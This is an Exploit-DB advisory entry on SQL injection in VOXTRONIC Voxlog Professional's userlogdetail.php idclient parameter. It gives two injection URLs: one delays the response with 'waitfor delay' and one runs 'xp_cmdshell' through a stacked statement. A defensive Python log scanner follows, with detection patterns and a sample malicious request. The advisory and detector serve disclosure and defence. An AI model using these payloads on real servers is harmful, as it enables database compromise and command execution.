VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection
2012-02-20T00:00:00
ID EDB-ID:36850 Type exploitdb Reporter J. Greil Modified 2012-02-20T00:00:00
Description
VOXTRONIC Voxlog Professional 3.7.x userlogdetail.php idclient Parameter SQL Injection. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/52081/info
VOXTRONIC Voxlog Professional is prone to a file-disclosure vulnerability and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to obtain potentially sensitive information from local files on computers running the vulnerable application, or modify the logic of SQL queries. A successful exploit may allow the attacker to compromise the software, retrieve information, or modify data; these may aid in further attacks.
VOXTRONIC Voxlog Professional 3.7.2.729 and 3.7.0.633 are vulnerable; other versions may also be affected.
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);waitfor delay '0:0:5' --+
http://www.example.com/voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=xxx);exec master..xp_cmdshell 'xxxxx' --+
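For defenders reviewing web server logs, the following added example (not part of the original advisory or of the vendor's code) flags requests to userlogdetail.php whose idclient parameter carries the T-SQL markers seen in the request strings above. The log lines are constructed samples in combined log format, and treating idclient as a numeric id is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Matches idclient and idclient[n] after percent-decoding the parameter name.
PARAM = re.compile(r"^idclient(\[[^\]]*\])?$", re.I)
# Assumption: a legitimate idclient value is a plain integer id.
NUMERIC = re.compile(r"^\d+$")
# T-SQL markers taken from the advisory's request strings.
MARKERS = [
    ("stacked-statement", re.compile(r";")),
    ("sql-comment", re.compile(r"--|/\*")),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b", re.I)),
    ("exec", re.compile(r"\bexec(ute)?\b", re.I)),
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [20/Feb/2012:10:00:01 +0000] "GET /voxlog/sysstat/userlogdetail.php?load=1&idclient[1]=42 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [20/Feb/2012:10:03:12 +0000] "GET /voxlog/sysstat/userlogdetail.php?load=1&idclient%5B1%5D=xxx)%3Bwaitfor+delay+\'0:0:5\'+--+ HTTP/1.1" 200 5120',
    '192.0.2.10 - - [20/Feb/2012:10:04:40 +0000] "GET /voxlog/index.php?idclient[1]=7 HTTP/1.1" 200 900',
]

def idclient_values(target):
    """Yield decoded (name, value) pairs for idclient / idclient[n] parameters."""
    for pair in target.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        if PARAM.match(name):
            yield name, value

def scan(lines, path_suffix="userlogdetail.php"):
    """Return (line_no, param, value, reasons) for each suspicious request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m or not m.group(1).partition("?")[0].endswith(path_suffix):
            continue
        for name, value in idclient_values(m.group(1)):
            reasons = [tag for tag, rx in MARKERS if rx.search(value)]
            if not NUMERIC.match(value):
                reasons.insert(0, "non-numeric")
            if reasons:
                hits.append((no, name, value, reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

Only the query string is inspected, so parameters sent in a POST body need request-body logging or a WAF rule to be covered.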
Exploit-DB entry: https://www.exploit-db.com/exploits/36850/
OSVDB ID: 84898